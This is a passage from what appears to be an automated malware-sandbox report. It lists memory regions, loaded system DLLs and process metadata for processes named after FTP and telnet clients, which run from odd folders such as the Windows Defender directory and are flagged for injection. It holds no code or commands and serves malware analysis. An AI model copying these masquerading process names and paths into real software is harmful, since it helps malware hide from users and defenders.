= 2479 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2480 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2483 start_va = 0x650000 end_va = 0x71cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000650000" filename = "" Thread: id = 124 os_tid = 0x11b0 Process: id = "26" image_name = "3dftp.exe" filename = "c:\\program files\\common files\\3dftp.exe" page_root = "0x5fd3d000" os_pid = "0x11b4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Common Files\\3dftp.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2484 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2485 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2486 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2487 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2488 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2489 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2490 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2491 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2492 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2493 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2494 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2495 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2496 start_va = 0x460000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 2497 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 2498 start_va = 0x4b0000 end_va = 0x4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2499 start_va = 0x4c0000 end_va = 0x57dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2500 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 2501 start_va = 0x780000 end_va = 0x907fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000780000" filename = "" Region: id = 2502 start_va = 0x910000 end_va = 0xa90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000910000" filename = "" Region: id = 2503 start_va = 0xaa0000 end_va = 0xb5bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 2504 start_va = 0x11a0000 end_va = 0x11b6fff monitored = 0 entry_point = 0x11a14a1 region_type = mapped_file name = "3dftp.exe" filename = "\\Program Files\\Common Files\\3dftp.exe" (normalized: "c:\\program files\\common files\\3dftp.exe") Region: id = 2505 start_va = 0x11c0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 2506 start_va = 0x25c0000 end_va = 0x2f83fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025c0000" filename = "" Region: id = 2507 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2508 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2509 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2510 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2511 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2512 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2513 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2514 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2515 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2516 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2517 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2518 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2519 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2520 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2521 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2522 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2523 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2524 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2525 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2526 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2527 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2528 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2529 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2530 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2531 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2532 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2534 start_va = 0x580000 end_va = 0x66efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Thread: id = 125 os_tid = 0x11b8 Process: id = "27" image_name = "absolutetelnet.exe" filename = "c:\\program files\\common files\\absolutetelnet.exe" page_root = "0x5fb51000" os_pid = "0x11bc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files\\Common Files\\absolutetelnet.exe\" " cur_dir = "C:\\Program Files\\Common Files\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2535 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2536 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2537 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2538 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2539 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2540 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2541 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2542 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2543 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2544 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2545 start_va = 0x220000 end_va = 0x223fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 2546 start_va = 0x250000 end_va = 0x25ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2547 start_va = 0x260000 end_va = 0x35ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 2548 start_va = 0x390000 end_va = 0x3a6fff monitored = 0 entry_point = 0x3914a1 region_type = mapped_file name = "absolutetelnet.exe" filename = "\\Program Files\\Common Files\\absolutetelnet.exe" (normalized: "c:\\program files\\common files\\absolutetelnet.exe") Region: id = 2549 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 2550 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2551 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2552 start_va = 0x7c0000 end_va = 0x947fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 2553 start_va = 0x950000 end_va = 0xad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000950000" filename = "" Region: id = 2554 start_va = 0xae0000 end_va = 0x1edffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ae0000" filename = "" Region: id = 2555 start_va = 0x1f70000 end_va = 0x1f7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 2556 start_va = 0x1f80000 end_va = 0x203bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f80000" filename = "" Region: id = 2557 start_va = 0x2040000 end_va = 0x2a03fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002040000" filename = "" Region: id = 2558 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2559 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2560 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2561 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2562 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2563 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2564 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2565 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2566 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2567 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2568 start_va = 0x758e0000 end_va = 0x75923fff monitored = 0 entry_point = 0x758f9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2569 start_va = 0x76410000 end_va = 0x764effff monitored = 0 entry_point = 0x76423980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2570 start_va = 0x764f0000 end_va = 0x7651afff monitored = 0 entry_point = 0x764f5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2571 start_va = 0x76570000 end_va = 0x7662dfff monitored = 0 entry_point = 0x765a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2572 start_va = 0x76630000 end_va = 0x766dcfff monitored = 0 entry_point = 0x76644f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2573 start_va = 0x769b0000 end_va = 0x76b6cfff monitored = 0 entry_point = 0x76a92a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2574 start_va = 0x76d80000 end_va = 0x76ecefff monitored = 0 entry_point = 0x76e36820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2575 start_va = 0x76f80000 end_va = 0x7709efff monitored = 0 entry_point = 0x76fc5980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2576 start_va = 0x77270000 end_va = 0x773edfff monitored = 0 entry_point = 0x77321b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2577 start_va = 0x77460000 end_va = 0x775dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2578 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2579 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2580 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2581 start_va = 0x7fff0000 end_va = 0x7ff884cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2582 start_va = 0x7ff884cc0000 end_va = 0x7ff884e80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2583 start_va = 0x7ff884e81000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff884e81000" filename = "" Region: id = 2585 start_va = 0x6c0000 end_va = 0x791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Thread: id = 126 os_tid = 0x11c0 Process: id = "28" image_name = "alftp.exe" filename = "c:\\program files (x86)\\windows defender\\alftp.exe" page_root = "0x61980000" os_pid = "0x11c4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "5" os_parent_pid = "0x748" cmd_line = "\"C:\\Program Files (x86)\\Windows Defender\\alftp.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Defender\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f600" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2586 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2587 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2588 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2589 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2590 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2591 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2592 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2593 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2594 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2595 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 2596 start_va = 0x1e0000 end_va = 0x1e3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2597 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2598 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2599 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 2600 start_va = 0x740000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000740000" filename = "" Region: id = 2601 start_va = 0x840000 end_va = 0x9c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000840000" filename = "" Region: id = 2602 start_va = 0x9d0000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009d0000" filename = "" Region: id = 2603 start_va = 0xb60000 end_va = 0xc1bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 2604 start_va = 0xc60000 end_va = 0xc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 2605 start_va = 0xd10000 end_va = 0xd26fff monitored = 0 entry_point = 0xd114a1 region_type = mapped_file name = "alftp.exe" filename = "\\Program Files (x86)\\Windows Defender\\alftp.exe" (normalized: "c:\\program files (x86)\\windows defender\\alftp.exe") Region: id = 2606 start_va = 0xd30000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d30000" filename = "" Region: id = 2607 start_va = 0x2280000 end_va = 0x228ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 2608 start_va = 0x2290000 end_va = 0x2c53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002290000" filename = "" Region: id = 2609 start_va = 0x5f960000 end_va = 0x5f9affff monitored = 0 entry_point = 0x5f978180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2610 start_va = 0x5f9b0000 end_va = 0x5fa29fff monitored = 0 entry_point = 0x5f9c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2611 start_va = 0x5fa30000 end_va = 0x5fa37fff monitored = 0 entry_point = 0x5fa317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2612 start_va = 0x6fb20000 end_va = 0x6fb3cfff monitored = 0 entry_point = 0x6fb23b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 2613 start_va = 0x70240000 end_va = 0x702b4fff monitored = 0 entry_point = 0x70279a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 2614 start_va = 0x740e0000 end_va = 0x74171fff monitored = 0 entry_point = 0x74120380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2615 start_va = 0x74180000 end_va = 0x74189fff monitored = 0 entry_point = 0x74182a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2616 start_va = 0x74190000 end_va = 0x741adfff monitored = 0 entry_point = 0x7419b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2617 start_va = 0x755e0000 end_va = 0x75726fff monitored = 0 entry_point = 0x755f1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2618 start_va = 0x75880000 end_va = 0x758d7fff monitored = 0 entry_point = 0x758c25c0 